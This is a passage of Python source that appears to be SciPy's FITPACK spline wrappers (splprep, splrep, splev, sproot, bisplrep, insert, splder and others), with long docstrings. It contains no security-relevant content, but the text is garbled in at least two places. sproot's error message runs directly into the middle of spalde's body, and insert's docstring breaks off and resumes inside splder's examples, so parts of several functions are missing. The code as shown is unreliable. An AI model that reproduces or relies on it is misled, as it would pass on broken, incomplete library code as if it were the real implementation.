arrays, `x`, which represent a curve in\n N-dimensional space parametrized by `u`, find a smooth approximating\n spline curve g(`u`). Uses the FORTRAN routine parcur from FITPACK.\n\n Parameters\n ----------\n x : array_like\n A list of sample vector arrays representing the curve.\n w : array_like, optional\n Strictly positive rank-1 array of weights the same length as `x[0]`.\n The weights are used in computing the weighted least-squares spline\n fit. If the errors in the `x` values have standard-deviation given by\n the vector d, then `w` should be 1/d. Default is ``ones(len(x[0]))``.\n u : array_like, optional\n An array of parameter values. If not given, these values are\n calculated automatically as ``M = len(x[0])``, where\n\n v[0] = 0\n\n v[i] = v[i-1] + distance(`x[i]`, `x[i-1]`)\n\n u[i] = v[i] / v[M-1]\n\n ub, ue : int, optional\n The end-points of the parameters interval. Defaults to\n u[0] and u[-1].\n k : int, optional\n Degree of the spline. Cubic splines are recommended.\n Even values of `k` should be avoided especially with a small s-value.\n ``1 <= k <= 5``, default is 3.\n task : int, optional\n If task==0 (default), find t and c for a given smoothing factor, s.\n If task==1, find t and c for another value of the smoothing factor, s.\n There must have been a previous call with task=0 or task=1\n for the same set of data.\n If task=-1 find the weighted least square spline for a given set of\n knots, t.\n s : float, optional\n A smoothing condition. The amount of smoothness is determined by\n satisfying the conditions: ``sum((w * (y - g))**2,axis=0) <= s``,\n where g(x) is the smoothed interpolation of (x,y). The user can\n use `s` to control the trade-off between closeness and smoothness\n of fit. Larger `s` means more smoothing while smaller values of `s`\n indicate less smoothing. Recommended values of `s` depend on the\n weights, w. If the weights represent the inverse of the\n standard-deviation of y, then a good `s` value should be found in\n the range ``(m-sqrt(2*m),m+sqrt(2*m))``, where m is the number of\n data points in x, y, and w.\n t : int, optional\n The knots needed for task=-1.\n full_output : int, optional\n If non-zero, then return optional outputs.\n nest : int, optional\n An over-estimate of the total number of knots of the spline to\n help in determining the storage space. By default nest=m/2.\n Always large enough is nest=m+k+1.\n per : int, optional\n If non-zero, data points are considered periodic with period\n ``x[m-1] - x[0]`` and a smooth periodic spline approximation is\n returned. Values of ``y[m-1]`` and ``w[m-1]`` are not used.\n quiet : int, optional\n Non-zero to suppress messages.\n This parameter is deprecated; use standard Python warning filters\n instead.\n\n Returns\n -------\n tck : tuple\n A tuple (t,c,k) containing the vector of knots, the B-spline\n coefficients, and the degree of the spline.\n u : array\n An array of the values of the parameter.\n fp : float\n The weighted sum of squared residuals of the spline approximation.\n ier : int\n An integer flag about splrep success. Success is indicated\n if ier<=0. If ier in [1,2,3] an error occurred but was not raised.\n Otherwise an error is raised.\n msg : str\n A message corresponding to the integer flag, ier.\n\n See Also\n --------\n splrep, splev, sproot, spalde, splint,\n bisplrep, bisplev\n UnivariateSpline, BivariateSpline\n\n Notes\n -----\n See `splev` for evaluation of the spline and its derivatives.\n The number of dimensions N must be smaller than 11.\n\n References\n ----------\n .. [1] P. Dierckx, \"Algorithms for smoothing data with periodic and\n parametric splines, Computer Graphics and Image Processing\",\n 20 (1982) 171-184.\n .. [2] P. Dierckx, \"Algorithms for smoothing data with periodic and\n parametric splines\", report tw55, Dept. Computer Science,\n K.U.Leuven, 1981.\n .. [3] P. Dierckx, \"Curve and surface fitting with splines\", Monographs on\n Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n if task <= 0:\n _parcur_cache = {'t': array([], float), 'wrk': array([], float),\n 'iwrk': array([], dfitpack_int), 'u': array([], float),\n 'ub': 0, 'ue': 1}\n x = atleast_1d(x)\n idim, m = x.shape\n if per:\n for i in range(idim):\n if x[i][0] != x[i][-1]:\n if quiet < 2:\n warnings.warn(RuntimeWarning('Setting x[%d][%d]=x[%d][0]' %\n (i, m, i)))\n x[i][-1] = x[i][0]\n if not 0 < idim < 11:\n raise TypeError('0 < idim < 11 must hold')\n if w is None:\n w = ones(m, float)\n else:\n w = atleast_1d(w)\n ipar = (u is not None)\n if ipar:\n _parcur_cache['u'] = u\n if ub is None:\n _parcur_cache['ub'] = u[0]\n else:\n _parcur_cache['ub'] = ub\n if ue is None:\n _parcur_cache['ue'] = u[-1]\n else:\n _parcur_cache['ue'] = ue\n else:\n _parcur_cache['u'] = zeros(m, float)\n if not (1 <= k <= 5):\n raise TypeError('1 <= k= %d <=5 must hold' % k)\n if not (-1 <= task <= 1):\n raise TypeError('task must be -1, 0 or 1')\n if (not len(w) == m) or (ipar == 1 and (not len(u) == m)):\n raise TypeError('Mismatch of input dimensions')\n if s is None:\n s = m - sqrt(2*m)\n if t is None and task == -1:\n raise TypeError('Knots must be given for task=-1')\n if t is not None:\n _parcur_cache['t'] = atleast_1d(t)\n n = len(_parcur_cache['t'])\n if task == -1 and n < 2*k + 2:\n raise TypeError('There must be at least 2*k+2 knots for task=-1')\n if m <= k:\n raise TypeError('m > k must hold')\n if nest is None:\n nest = m + 2*k\n\n if (task >= 0 and s == 0) or (nest < 0):\n if per:\n nest = m + 2*k\n else:\n nest = m + k + 1\n nest = max(nest, 2*k + 3)\n u = _parcur_cache['u']\n ub = _parcur_cache['ub']\n ue = _parcur_cache['ue']\n t = _parcur_cache['t']\n wrk = _parcur_cache['wrk']\n iwrk = _parcur_cache['iwrk']\n t, c, o = _fitpack._parcur(ravel(transpose(x)), w, u, ub, ue, k,\n task, ipar, s, t, nest, wrk, iwrk, per)\n _parcur_cache['u'] = o['u']\n _parcur_cache['ub'] = o['ub']\n _parcur_cache['ue'] = o['ue']\n _parcur_cache['t'] = t\n _parcur_cache['wrk'] = o['wrk']\n _parcur_cache['iwrk'] = o['iwrk']\n ier = o['ier']\n fp = o['fp']\n n = len(t)\n u = o['u']\n c.shape = idim, n - k - 1\n tcku = [t, list(c), k], u\n if ier <= 0 and not quiet:\n warnings.warn(RuntimeWarning(_iermess[ier][0] +\n \"\\tk=%d n=%d m=%d fp=%f s=%f\" %\n (k, len(t), m, fp, s)))\n if ier > 0 and not full_output:\n if ier in [1, 2, 3]:\n warnings.warn(RuntimeWarning(_iermess[ier][0]))\n else:\n try:\n raise _iermess[ier][1](_iermess[ier][0])\n except KeyError as e:\n raise _iermess['unknown'][1](_iermess['unknown'][0]) from e\n if full_output:\n try:\n return tcku, fp, ier, _iermess[ier][0]\n except KeyError:\n return tcku, fp, ier, _iermess['unknown'][0]\n else:\n return tcku\n\n\n_curfit_cache = {'t': array([], float), 'wrk': array([], float),\n 'iwrk': array([], dfitpack_int)}\n\n\ndef splrep(x, y, w=None, xb=None, xe=None, k=3, task=0, s=None, t=None,\n full_output=0, per=0, quiet=1):\n \"\"\"\n Find the B-spline representation of 1-D curve.\n\n Given the set of data points ``(x[i], y[i])`` determine a smooth spline\n approximation of degree k on the interval ``xb <= x <= xe``.\n\n Parameters\n ----------\n x, y : array_like\n The data points defining a curve y = f(x).\n w : array_like, optional\n Strictly positive rank-1 array of weights the same length as x and y.\n The weights are used in computing the weighted least-squares spline\n fit. If the errors in the y values have standard-deviation given by the\n vector d, then w should be 1/d. Default is ones(len(x)).\n xb, xe : float, optional\n The interval to fit. If None, these default to x[0] and x[-1]\n respectively.\n k : int, optional\n The order of the spline fit. It is recommended to use cubic splines.\n Even order splines should be avoided especially with small s values.\n 1 <= k <= 5\n task : {1, 0, -1}, optional\n If task==0 find t and c for a given smoothing factor, s.\n\n If task==1 find t and c for another value of the smoothing factor, s.\n There must have been a previous call with task=0 or task=1 for the same\n set of data (t will be stored an used internally)\n\n If task=-1 find the weighted least square spline for a given set of\n knots, t. These should be interior knots as knots on the ends will be\n added automatically.\n s : float, optional\n A smoothing condition. The amount of smoothness is determined by\n satisfying the conditions: sum((w * (y - g))**2,axis=0) <= s, where g(x)\n is the smoothed interpolation of (x,y). The user can use s to control\n the tradeoff between closeness and smoothness of fit. Larger s means\n more smoothing while smaller values of s indicate less smoothing.\n Recommended values of s depend on the weights, w. If the weights\n represent the inverse of the standard-deviation of y, then a good s\n value should be found in the range (m-sqrt(2*m),m+sqrt(2*m)) where m is\n the number of datapoints in x, y, and w. default : s=m-sqrt(2*m) if\n weights are supplied. s = 0.0 (interpolating) if no weights are\n supplied.\n t : array_like, optional\n The knots needed for task=-1. If given then task is automatically set\n to -1.\n full_output : bool, optional\n If non-zero, then return optional outputs.\n per : bool, optional\n If non-zero, data points are considered periodic with period x[m-1] -\n x[0] and a smooth periodic spline approximation is returned. Values of\n y[m-1] and w[m-1] are not used.\n quiet : bool, optional\n Non-zero to suppress messages.\n This parameter is deprecated; use standard Python warning filters\n instead.\n\n Returns\n -------\n tck : tuple\n (t,c,k) a tuple containing the vector of knots, the B-spline\n coefficients, and the degree of the spline.\n fp : array, optional\n The weighted sum of squared residuals of the spline approximation.\n ier : int, optional\n An integer flag about splrep success. Success is indicated if ier<=0.\n If ier in [1,2,3] an error occurred but was not raised. Otherwise an\n error is raised.\n msg : str, optional\n A message corresponding to the integer flag, ier.\n\n See Also\n --------\n UnivariateSpline, BivariateSpline\n splprep, splev, sproot, spalde, splint\n bisplrep, bisplev\n\n Notes\n -----\n See splev for evaluation of the spline and its derivatives. Uses the\n FORTRAN routine curfit from FITPACK.\n\n The user is responsible for assuring that the values of *x* are unique.\n Otherwise, *splrep* will not return sensible results.\n\n If provided, knots `t` must satisfy the Schoenberg-Whitney conditions,\n i.e., there must be a subset of data points ``x[j]`` such that\n ``t[j] < x[j] < t[j+k+1]``, for ``j=0, 1,...,n-k-2``.\n\n References\n ----------\n Based on algorithms described in [1]_, [2]_, [3]_, and [4]_:\n\n .. [1] P. Dierckx, \"An algorithm for smoothing, differentiation and\n integration of experimental data using spline functions\",\n J.Comp.Appl.Maths 1 (1975) 165-184.\n .. [2] P. Dierckx, \"A fast algorithm for smoothing data on a rectangular\n grid while using spline functions\", SIAM J.Numer.Anal. 19 (1982)\n 1286-1304.\n .. [3] P. Dierckx, \"An improved algorithm for curve fitting with spline\n functions\", report tw54, Dept. Computer Science,K.U. Leuven, 1981.\n .. [4] P. Dierckx, \"Curve and surface fitting with splines\", Monographs on\n Numerical Analysis, Oxford University Press, 1993.\n\n Examples\n --------\n\n >>> import matplotlib.pyplot as plt\n >>> from scipy.interpolate import splev, splrep\n >>> x = np.linspace(0, 10, 10)\n >>> y = np.sin(x)\n >>> tck = splrep(x, y)\n >>> x2 = np.linspace(0, 10, 200)\n >>> y2 = splev(x2, tck)\n >>> plt.plot(x, y, 'o', x2, y2)\n >>> plt.show()\n\n \"\"\"\n if task <= 0:\n _curfit_cache = {}\n x, y = map(atleast_1d, [x, y])\n m = len(x)\n if w is None:\n w = ones(m, float)\n if s is None:\n s = 0.0\n else:\n w = atleast_1d(w)\n if s is None:\n s = m - sqrt(2*m)\n if not len(w) == m:\n raise TypeError('len(w)=%d is not equal to m=%d' % (len(w), m))\n if (m != len(y)) or (m != len(w)):\n raise TypeError('Lengths of the first three arguments (x,y,w) must '\n 'be equal')\n if not (1 <= k <= 5):\n raise TypeError('Given degree of the spline (k=%d) is not supported. '\n '(1<=k<=5)' % k)\n if m <= k:\n raise TypeError('m > k must hold')\n if xb is None:\n xb = x[0]\n if xe is None:\n xe = x[-1]\n if not (-1 <= task <= 1):\n raise TypeError('task must be -1, 0 or 1')\n if t is not None:\n task = -1\n if task == -1:\n if t is None:\n raise TypeError('Knots must be given for task=-1')\n numknots = len(t)\n _curfit_cache['t'] = empty((numknots + 2*k + 2,), float)\n _curfit_cache['t'][k+1:-k-1] = t\n nest = len(_curfit_cache['t'])\n elif task == 0:\n if per:\n nest = max(m + 2*k, 2*k + 3)\n else:\n nest = max(m + k + 1, 2*k + 3)\n t = empty((nest,), float)\n _curfit_cache['t'] = t\n if task <= 0:\n if per:\n _curfit_cache['wrk'] = empty((m*(k + 1) + nest*(8 + 5*k),), float)\n else:\n _curfit_cache['wrk'] = empty((m*(k + 1) + nest*(7 + 3*k),), float)\n _curfit_cache['iwrk'] = empty((nest,), dfitpack_int)\n try:\n t = _curfit_cache['t']\n wrk = _curfit_cache['wrk']\n iwrk = _curfit_cache['iwrk']\n except KeyError as e:\n raise TypeError(\"must call with task=1 only after\"\n \" call with task=0,-1\") from e\n if not per:\n n, c, fp, ier = dfitpack.curfit(task, x, y, w, t, wrk, iwrk,\n xb, xe, k, s)\n else:\n n, c, fp, ier = dfitpack.percur(task, x, y, w, t, wrk, iwrk, k, s)\n tck = (t[:n], c[:n], k)\n if ier <= 0 and not quiet:\n _mess = (_iermess[ier][0] + \"\\tk=%d n=%d m=%d fp=%f s=%f\" %\n (k, len(t), m, fp, s))\n warnings.warn(RuntimeWarning(_mess))\n if ier > 0 and not full_output:\n if ier in [1, 2, 3]:\n warnings.warn(RuntimeWarning(_iermess[ier][0]))\n else:\n try:\n raise _iermess[ier][1](_iermess[ier][0])\n except KeyError as e:\n raise _iermess['unknown'][1](_iermess['unknown'][0]) from e\n if full_output:\n try:\n return tck, fp, ier, _iermess[ier][0]\n except KeyError:\n return tck, fp, ier, _iermess['unknown'][0]\n else:\n return tck\n\n\ndef splev(x, tck, der=0, ext=0):\n \"\"\"\n Evaluate a B-spline or its derivatives.\n\n Given the knots and coefficients of a B-spline representation, evaluate\n the value of the smoothing polynomial and its derivatives. This is a\n wrapper around the FORTRAN routines splev and splder of FITPACK.\n\n Parameters\n ----------\n x : array_like\n An array of points at which to return the value of the smoothed\n spline or its derivatives. If `tck` was returned from `splprep`,\n then the parameter values, u should be given.\n tck : tuple\n A sequence of length 3 returned by `splrep` or `splprep` containing\n the knots, coefficients, and degree of the spline.\n der : int, optional\n The order of derivative of the spline to compute (must be less than\n or equal to k).\n ext : int, optional\n Controls the value returned for elements of ``x`` not in the\n interval defined by the knot sequence.\n\n * if ext=0, return the extrapolated value.\n * if ext=1, return 0\n * if ext=2, raise a ValueError\n * if ext=3, return the boundary value.\n\n The default value is 0.\n\n Returns\n -------\n y : ndarray or list of ndarrays\n An array of values representing the spline function evaluated at\n the points in ``x``. If `tck` was returned from `splprep`, then this\n is a list of arrays representing the curve in N-D space.\n\n See Also\n --------\n splprep, splrep, sproot, spalde, splint\n bisplrep, bisplev\n\n References\n ----------\n .. [1] C. de Boor, \"On calculating with b-splines\", J. Approximation\n Theory, 6, p.50-62, 1972.\n .. [2] M.G. Cox, \"The numerical evaluation of b-splines\", J. Inst. Maths\n Applics, 10, p.134-149, 1972.\n .. [3] P. Dierckx, \"Curve and surface fitting with splines\", Monographs\n on Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n t, c, k = tck\n try:\n c[0][0]\n parametric = True\n except Exception:\n parametric = False\n if parametric:\n return list(map(lambda c, x=x, t=t, k=k, der=der:\n splev(x, [t, c, k], der, ext), c))\n else:\n if not (0 <= der <= k):\n raise ValueError(\"0<=der=%d<=k=%d must hold\" % (der, k))\n if ext not in (0, 1, 2, 3):\n raise ValueError(\"ext = %s not in (0, 1, 2, 3) \" % ext)\n\n x = asarray(x)\n shape = x.shape\n x = atleast_1d(x).ravel()\n y, ier = _fitpack._spl_(x, der, t, c, k, ext)\n\n if ier == 10:\n raise ValueError(\"Invalid input data\")\n if ier == 1:\n raise ValueError(\"Found x value not in the domain\")\n if ier:\n raise TypeError(\"An error occurred\")\n\n return y.reshape(shape)\n\n\ndef splint(a, b, tck, full_output=0):\n \"\"\"\n Evaluate the definite integral of a B-spline.\n\n Given the knots and coefficients of a B-spline, evaluate the definite\n integral of the smoothing polynomial between two given points.\n\n Parameters\n ----------\n a, b : float\n The end-points of the integration interval.\n tck : tuple\n A tuple (t,c,k) containing the vector of knots, the B-spline\n coefficients, and the degree of the spline (see `splev`).\n full_output : int, optional\n Non-zero to return optional output.\n\n Returns\n -------\n integral : float\n The resulting integral.\n wrk : ndarray\n An array containing the integrals of the normalized B-splines\n defined on the set of knots.\n\n Notes\n -----\n splint silently assumes that the spline function is zero outside the data\n interval (a, b).\n\n See Also\n --------\n splprep, splrep, sproot, spalde, splev\n bisplrep, bisplev\n UnivariateSpline, BivariateSpline\n\n References\n ----------\n .. [1] P.W. Gaffney, The calculation of indefinite integrals of b-splines\",\n J. Inst. Maths Applics, 17, p.37-41, 1976.\n .. [2] P. Dierckx, \"Curve and surface fitting with splines\", Monographs\n on Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n t, c, k = tck\n try:\n c[0][0]\n parametric = True\n except Exception:\n parametric = False\n if parametric:\n return list(map(lambda c, a=a, b=b, t=t, k=k:\n splint(a, b, [t, c, k]), c))\n else:\n aint, wrk = _fitpack._splint(t, c, k, a, b)\n if full_output:\n return aint, wrk\n else:\n return aint\n\n\ndef sproot(tck, mest=10):\n \"\"\"\n Find the roots of a cubic B-spline.\n\n Given the knots (>=8) and coefficients of a cubic B-spline return the\n roots of the spline.\n\n Parameters\n ----------\n tck : tuple\n A tuple (t,c,k) containing the vector of knots,\n the B-spline coefficients, and the degree of the spline.\n The number of knots must be >= 8, and the degree must be 3.\n The knots must be a montonically increasing sequence.\n mest : int, optional\n An estimate of the number of zeros (Default is 10).\n\n Returns\n -------\n zeros : ndarray\n An array giving the roots of the spline.\n\n See also\n --------\n splprep, splrep, splint, spalde, splev\n bisplrep, bisplev\n UnivariateSpline, BivariateSpline\n\n\n References\n ----------\n .. [1] C. de Boor, \"On calculating with b-splines\", J. Approximation\n Theory, 6, p.50-62, 1972.\n .. [2] M.G. Cox, \"The numerical evaluation of b-splines\", J. Inst. Maths\n Applics, 10, p.134-149, 1972.\n .. [3] P. Dierckx, \"Curve and surface fitting with splines\", Monographs\n on Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n t, c, k = tck\n if k != 3:\n raise ValueError(\"sproot works only for cubic (k=3) splines\")\n try:\n c[0][0]\n parametric = True\n except Exception:\n parametric = False\n if parametric:\n return list(map(lambda c, t=t, k=k, mest=mest:\n sproot([t, c, k], mest), c))\n else:\n if len(t) < 8:\n raise TypeError(\"The number of knots %d>=8\" % len(t))\n z, ier = _fitpack._sproot(t, c, k, mest)\n if ier == 10:\n raise TypeError(\"Invalid input data. \"\n \"t1<=..<=t4 1:\n return list(map(lambda x, tck=tck: spalde(x, tck), x))\n d, ier = _fitpack._spalde(t, c, k, x[0])\n if ier == 0:\n return d\n if ier == 10:\n raise TypeError(\"Invalid input data. t(k)<=x<=t(n-k+1) must hold.\")\n raise TypeError(\"Unknown error\")\n\n# def _curfit(x,y,w=None,xb=None,xe=None,k=3,task=0,s=None,t=None,\n# full_output=0,nest=None,per=0,quiet=1):\n\n\n_surfit_cache = {'tx': array([], float), 'ty': array([], float),\n 'wrk': array([], float), 'iwrk': array([], dfitpack_int)}\n\n\ndef bisplrep(x, y, z, w=None, xb=None, xe=None, yb=None, ye=None,\n kx=3, ky=3, task=0, s=None, eps=1e-16, tx=None, ty=None,\n full_output=0, nxest=None, nyest=None, quiet=1):\n \"\"\"\n Find a bivariate B-spline representation of a surface.\n\n Given a set of data points (x[i], y[i], z[i]) representing a surface\n z=f(x,y), compute a B-spline representation of the surface. Based on\n the routine SURFIT from FITPACK.\n\n Parameters\n ----------\n x, y, z : ndarray\n Rank-1 arrays of data points.\n w : ndarray, optional\n Rank-1 array of weights. By default ``w=np.ones(len(x))``.\n xb, xe : float, optional\n End points of approximation interval in `x`.\n By default ``xb = x.min(), xe=x.max()``.\n yb, ye : float, optional\n End points of approximation interval in `y`.\n By default ``yb=y.min(), ye = y.max()``.\n kx, ky : int, optional\n The degrees of the spline (1 <= kx, ky <= 5).\n Third order (kx=ky=3) is recommended.\n task : int, optional\n If task=0, find knots in x and y and coefficients for a given\n smoothing factor, s.\n If task=1, find knots and coefficients for another value of the\n smoothing factor, s. bisplrep must have been previously called\n with task=0 or task=1.\n If task=-1, find coefficients for a given set of knots tx, ty.\n s : float, optional\n A non-negative smoothing factor. If weights correspond\n to the inverse of the standard-deviation of the errors in z,\n then a good s-value should be found in the range\n ``(m-sqrt(2*m),m+sqrt(2*m))`` where m=len(x).\n eps : float, optional\n A threshold for determining the effective rank of an\n over-determined linear system of equations (0 < eps < 1).\n `eps` is not likely to need changing.\n tx, ty : ndarray, optional\n Rank-1 arrays of the knots of the spline for task=-1\n full_output : int, optional\n Non-zero to return optional outputs.\n nxest, nyest : int, optional\n Over-estimates of the total number of knots. If None then\n ``nxest = max(kx+sqrt(m/2),2*kx+3)``,\n ``nyest = max(ky+sqrt(m/2),2*ky+3)``.\n quiet : int, optional\n Non-zero to suppress printing of messages.\n This parameter is deprecated; use standard Python warning filters\n instead.\n\n Returns\n -------\n tck : array_like\n A list [tx, ty, c, kx, ky] containing the knots (tx, ty) and\n coefficients (c) of the bivariate B-spline representation of the\n surface along with the degree of the spline.\n fp : ndarray\n The weighted sum of squared residuals of the spline approximation.\n ier : int\n An integer flag about splrep success. Success is indicated if\n ier<=0. If ier in [1,2,3] an error occurred but was not raised.\n Otherwise an error is raised.\n msg : str\n A message corresponding to the integer flag, ier.\n\n See Also\n --------\n splprep, splrep, splint, sproot, splev\n UnivariateSpline, BivariateSpline\n\n Notes\n -----\n See `bisplev` to evaluate the value of the B-spline given its tck\n representation.\n\n References\n ----------\n .. [1] Dierckx P.:An algorithm for surface fitting with spline functions\n Ima J. Numer. Anal. 1 (1981) 267-283.\n .. [2] Dierckx P.:An algorithm for surface fitting with spline functions\n report tw50, Dept. Computer Science,K.U.Leuven, 1980.\n .. [3] Dierckx P.:Curve and surface fitting with splines, Monographs on\n Numerical Analysis, Oxford University Press, 1993.\n\n Examples\n --------\n Examples are given :ref:`in the tutorial `.\n\n \"\"\"\n x, y, z = map(ravel, [x, y, z]) # ensure 1-d arrays.\n m = len(x)\n if not (m == len(y) == len(z)):\n raise TypeError('len(x)==len(y)==len(z) must hold.')\n if w is None:\n w = ones(m, float)\n else:\n w = atleast_1d(w)\n if not len(w) == m:\n raise TypeError('len(w)=%d is not equal to m=%d' % (len(w), m))\n if xb is None:\n xb = x.min()\n if xe is None:\n xe = x.max()\n if yb is None:\n yb = y.min()\n if ye is None:\n ye = y.max()\n if not (-1 <= task <= 1):\n raise TypeError('task must be -1, 0 or 1')\n if s is None:\n s = m - sqrt(2*m)\n if tx is None and task == -1:\n raise TypeError('Knots_x must be given for task=-1')\n if tx is not None:\n _surfit_cache['tx'] = atleast_1d(tx)\n nx = len(_surfit_cache['tx'])\n if ty is None and task == -1:\n raise TypeError('Knots_y must be given for task=-1')\n if ty is not None:\n _surfit_cache['ty'] = atleast_1d(ty)\n ny = len(_surfit_cache['ty'])\n if task == -1 and nx < 2*kx+2:\n raise TypeError('There must be at least 2*kx+2 knots_x for task=-1')\n if task == -1 and ny < 2*ky+2:\n raise TypeError('There must be at least 2*ky+2 knots_x for task=-1')\n if not ((1 <= kx <= 5) and (1 <= ky <= 5)):\n raise TypeError('Given degree of the spline (kx,ky=%d,%d) is not '\n 'supported. (1<=k<=5)' % (kx, ky))\n if m < (kx + 1)*(ky + 1):\n raise TypeError('m >= (kx+1)(ky+1) must hold')\n if nxest is None:\n nxest = int(kx + sqrt(m/2))\n if nyest is None:\n nyest = int(ky + sqrt(m/2))\n nxest, nyest = max(nxest, 2*kx + 3), max(nyest, 2*ky + 3)\n if task >= 0 and s == 0:\n nxest = int(kx + sqrt(3*m))\n nyest = int(ky + sqrt(3*m))\n if task == -1:\n _surfit_cache['tx'] = atleast_1d(tx)\n _surfit_cache['ty'] = atleast_1d(ty)\n tx, ty = _surfit_cache['tx'], _surfit_cache['ty']\n wrk = _surfit_cache['wrk']\n u = nxest - kx - 1\n v = nyest - ky - 1\n km = max(kx, ky) + 1\n ne = max(nxest, nyest)\n bx, by = kx*v + ky + 1, ky*u + kx + 1\n b1, b2 = bx, bx + v - ky\n if bx > by:\n b1, b2 = by, by + u - kx\n msg = \"Too many data points to interpolate\"\n lwrk1 = _int_overflow(u*v*(2 + b1 + b2) +\n 2*(u + v + km*(m + ne) + ne - kx - ky) + b2 + 1,\n msg=msg)\n lwrk2 = _int_overflow(u*v*(b2 + 1) + b2, msg=msg)\n tx, ty, c, o = _fitpack._surfit(x, y, z, w, xb, xe, yb, ye, kx, ky,\n task, s, eps, tx, ty, nxest, nyest,\n wrk, lwrk1, lwrk2)\n _curfit_cache['tx'] = tx\n _curfit_cache['ty'] = ty\n _curfit_cache['wrk'] = o['wrk']\n ier, fp = o['ier'], o['fp']\n tck = [tx, ty, c, kx, ky]\n\n ierm = min(11, max(-3, ier))\n if ierm <= 0 and not quiet:\n _mess = (_iermess2[ierm][0] +\n \"\\tkx,ky=%d,%d nx,ny=%d,%d m=%d fp=%f s=%f\" %\n (kx, ky, len(tx), len(ty), m, fp, s))\n warnings.warn(RuntimeWarning(_mess))\n if ierm > 0 and not full_output:\n if ier in [1, 2, 3, 4, 5]:\n _mess = (\"\\n\\tkx,ky=%d,%d nx,ny=%d,%d m=%d fp=%f s=%f\" %\n (kx, ky, len(tx), len(ty), m, fp, s))\n warnings.warn(RuntimeWarning(_iermess2[ierm][0] + _mess))\n else:\n try:\n raise _iermess2[ierm][1](_iermess2[ierm][0])\n except KeyError as e:\n raise _iermess2['unknown'][1](_iermess2['unknown'][0]) from e\n if full_output:\n try:\n return tck, fp, ier, _iermess2[ierm][0]\n except KeyError:\n return tck, fp, ier, _iermess2['unknown'][0]\n else:\n return tck\n\n\ndef bisplev(x, y, tck, dx=0, dy=0):\n \"\"\"\n Evaluate a bivariate B-spline and its derivatives.\n\n Return a rank-2 array of spline function values (or spline derivative\n values) at points given by the cross-product of the rank-1 arrays `x` and\n `y`. In special cases, return an array or just a float if either `x` or\n `y` or both are floats. Based on BISPEV from FITPACK.\n\n Parameters\n ----------\n x, y : ndarray\n Rank-1 arrays specifying the domain over which to evaluate the\n spline or its derivative.\n tck : tuple\n A sequence of length 5 returned by `bisplrep` containing the knot\n locations, the coefficients, and the degree of the spline:\n [tx, ty, c, kx, ky].\n dx, dy : int, optional\n The orders of the partial derivatives in `x` and `y` respectively.\n\n Returns\n -------\n vals : ndarray\n The B-spline or its derivative evaluated over the set formed by\n the cross-product of `x` and `y`.\n\n See Also\n --------\n splprep, splrep, splint, sproot, splev\n UnivariateSpline, BivariateSpline\n\n Notes\n -----\n See `bisplrep` to generate the `tck` representation.\n\n References\n ----------\n .. [1] Dierckx P. : An algorithm for surface fitting\n with spline functions\n Ima J. Numer. Anal. 1 (1981) 267-283.\n .. [2] Dierckx P. : An algorithm for surface fitting\n with spline functions\n report tw50, Dept. Computer Science,K.U.Leuven, 1980.\n .. [3] Dierckx P. : Curve and surface fitting with splines,\n Monographs on Numerical Analysis, Oxford University Press, 1993.\n\n Examples\n --------\n Examples are given :ref:`in the tutorial `.\n\n \"\"\"\n tx, ty, c, kx, ky = tck\n if not (0 <= dx < kx):\n raise ValueError(\"0 <= dx = %d < kx = %d must hold\" % (dx, kx))\n if not (0 <= dy < ky):\n raise ValueError(\"0 <= dy = %d < ky = %d must hold\" % (dy, ky))\n x, y = map(atleast_1d, [x, y])\n if (len(x.shape) != 1) or (len(y.shape) != 1):\n raise ValueError(\"First two entries should be rank-1 arrays.\")\n z, ier = _fitpack._bispev(tx, ty, c, kx, ky, x, y, dx, dy)\n if ier == 10:\n raise ValueError(\"Invalid input data\")\n if ier:\n raise TypeError(\"An error occurred\")\n z.shape = len(x), len(y)\n if len(z) > 1:\n return z\n if len(z[0]) > 1:\n return z[0]\n return z[0][0]\n\n\ndef dblint(xa, xb, ya, yb, tck):\n \"\"\"Evaluate the integral of a spline over area [xa,xb] x [ya,yb].\n\n Parameters\n ----------\n xa, xb : float\n The end-points of the x integration interval.\n ya, yb : float\n The end-points of the y integration interval.\n tck : list [tx, ty, c, kx, ky]\n A sequence of length 5 returned by bisplrep containing the knot\n locations tx, ty, the coefficients c, and the degrees kx, ky\n of the spline.\n\n Returns\n -------\n integ : float\n The value of the resulting integral.\n \"\"\"\n tx, ty, c, kx, ky = tck\n return dfitpack.dblint(tx, ty, c, kx, ky, xa, xb, ya, yb)\n\n\ndef insert(x, tck, m=1, per=0):\n \"\"\"\n Insert knots into a B-spline.\n\n Given the knots and coefficients of a B-spline representation, create a\n new B-spline with a knot inserted `m` times at point `x`.\n This is a wrapper around the FORTRAN routine insert of FITPACK.\n\n Parameters\n ----------\n x (u) : array_like\n A 1-D point at which to insert a new knot(s). If `tck` was returned\n from ``splprep``, then the parameter values, u should be given.\n tck : tuple\n A tuple (t,c,k) returned by ``splrep`` or ``splprep`` containing\n the vector of knots, the B-spline coefficients,\n and the degree of the spline.\n m : int, optional\n The number of times to insert the given knot (its multiplicity).\n Default is 1.\n per : int, optional\n If non-zero, the input spline is considered periodic.\n\n Returns\n -------\n tck : tuple\n A tuple (t,c,k) containing the vector of knots, the B-spline\n coefficients, and the degree of the new spline.\n ``t(k+1) <= x <= t(n-k)``, where k is the degree of the spline.\n In case of a periodic spline (``per != 0``) there must be\n either at least k interior knots t(j) satisfying ``t(k+1)>> from scipy.interpolate import splrep, splder, sproot\n >>> x = np.linspace(0, 10, 70)\n >>> y = np.sin(x)\n >>> spl = splrep(x, y, k=4)\n\n Now, differentiate the spline and find the zeros of the\n derivative. (NB: `sproot` only works for order 3 splines, so we\n fit an order 4 spline):\n\n >>> dspl = splder(spl)\n >>> sproot(dspl) / np.pi\n array([ 0.50000001, 1.5 , 2.49999998])\n\n This agrees well with roots :math:`\\\\pi/2 + n\\\\pi` of\n :math:`\\\\cos(x) = \\\\sin'(x)`.\n\n \"\"\"\n if n < 0:\n return splantider(tck, -n)\n\n t, c, k = tck\n\n if n > k:\n raise ValueError((\"Order of derivative (n = %r) must be <= \"\n \"order of spline (k = %r)\") % (n, tck[2]))\n\n # Extra axes for the trailing dims of the `c` array:\n sh = (slice(None),) + ((None,)*len(c.shape[1:]))\n\n with np.errstate(invalid='raise', divide='raise'):\n try:\n for j in range(n):\n # See e.g. Schumaker, Spline Functions: Basic Theory, Chapter 5\n\n # Compute the denominator in the differentiation formula.\n # (and append traling dims, if necessary)\n dt = t[k+1:-1] - 